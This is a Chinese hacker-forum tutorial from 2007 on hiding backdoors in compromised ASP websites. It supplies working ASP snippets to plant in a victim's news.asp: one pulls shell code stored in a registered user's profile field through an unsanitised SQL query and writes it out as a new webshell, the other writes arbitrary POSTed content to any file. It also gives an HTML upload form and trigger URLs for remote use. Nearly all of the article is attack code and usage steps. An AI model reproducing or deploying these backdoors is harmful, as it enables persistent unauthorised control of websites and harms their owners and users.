巧妙利用.mdb后缀数据库做后门
www.hx99.org 阅读:
时间:2007-07-09 整理:华西黑盟
------------------------------------------------------------------ |
引言:好长时间了,从刚开始的站点管理器到现在流行的几款asp后门,相信大多网管都能说出这些经典webshell的名字,如海洋、老兵、蓝屏等,也相信大多数的网管学会了关键字的搜索方法来搜索这些木马,当然现在的时间如果再象隐藏后门就要讲些技巧啦,俗话说的好"佛高一尺,我高一丈"。
我不否认n早前的那个把asp木马写到图片文件中不失为一种好的方法,其实不仅可以写到图片啦写到mp3文件里写到doc文件里都是可以的啦
copy文件名/参数+文件名/参数生成文件名
这样的方法可以很灵活的运用来达到隐藏文件的目的,具体的参数就是/a以acsic码方式,/b二进制方式,就不罗嗦这些了,至于如何上传webshell,什么是webshell也不属于本文的讨论范围。今天要讲的是如何把后门放到后缀.mdb的数据库中,前提是在我们拿到
一个webshell之后...
我们所知道的,很多站点在用户注册的时候要让填好多东西例如:
用户名、密码、QQ、邮箱、个人简介、电话、联系方式、住址一类的
而对应到数据库中也都会有相应的表字段值
我今天要做的就是我注册一个用户在我的个人简介的地方上写入shell代码,然后修改他站点上的一个文件,使用的时候触发这个文件,就把我个人简历中的shell代码,备份到当前目录下
废话少说了大家看代码
<%
ifrequest("action")="firefox"then
fname=request.querystring("fn")
tname=request.querystring("tn")
bname=request.querystring("bn")
id=request.querystring("id")
idvalue=request.querystring("idv")
setrs=server.createobject("ADODB.recordset")
sql="select"&bname&"from"&tname&"where"&id&"="&idvalue&""""
rs.opensql,conn,1,3
ifnotrs.eofthen
content=rs(bname)
else
response.write"Nothing"
endif
setfso=Server.createObject("Scripting.FileSystemObject")
settxtfile=fso.createtextfile(server.mappath(fname))
txtfile.writeline(content)
txtfile.close
endif
%>
将上边的代码加到站点的一个文件中如news.asp
根据我们了解的信息在其站点注册后下载数据库看结构
我注册的firefox名字是在user表其id值为119用于存放我注册简历的表字段为jl
那么在使用的时候我们
news.asp?action=firefox&fn=firefox.asp&tn=user&bn=jl&id=id&idv=119
就可以在news.asp相同目录下写入一个名为firefox.asp的webshell
以上可以说是万千隐藏方法中的一种下边再说另外一种更方便的隐藏方法
这个方法就和mdb后缀无关系了
同样我们还是修改news.asp将以下代码插入到对方news.asp中
<%
ifrequest("action")="firefox"then
n=request.form("n")
c=request.form("c")
setfso=Server.createObject("Scripting.FileSystemObject")
settxtfile=fso.createtextfile(server.mappath(n))
txtfile.writeline(c)
txtfile.close
endif
%>
这段代码相对简单些算是一个木马的服务端吧
使用的时候以这段代码配合
<HTML><HEAD>
<METAhttp-equiv=Content-Typecontent="text/html;charset=gb2312">
<title>F.s.t火狐技术联盟[www.wrsky.com]</title>
<FORMaction="http://localhost/config.asp?action=firefox"method=post>
<METAcontent="MSHTML6.00.2900.2180"name=GENERATOR></HEAD>
<BODY>Name:<INPUTsize=50
name=nwidth="32"><BR><BR>Shell:<TEXTAREAname=crows=10cols=80
width="32"></TEXTAREA><INPUTtype=submitvalue=Save></FORM></BODY></HTML>
将以上代码中的
http://localhost/config.asp?action=firefox
替换成你的服务端地址
然后保存为本地的.htm文件
本地打开后定义要生成的文件名文件内容远程提交ok又是一种留后门的方法
此文没有太高的技术含量技术交流可以到www.wrsky.com
还望各为大牛多多提携
巧妙利用.mdb后缀数据库做后门
|
|
| --------------------------------------------------------------------------------------------------- |
上一篇:多图详解:入侵国内某知名网站记录
下一篇:入侵网站的漏洞利用和搜索参数 |
| --------------------------------------------------------------------------------------------------- |
|
|
|
|
|
当前位置:
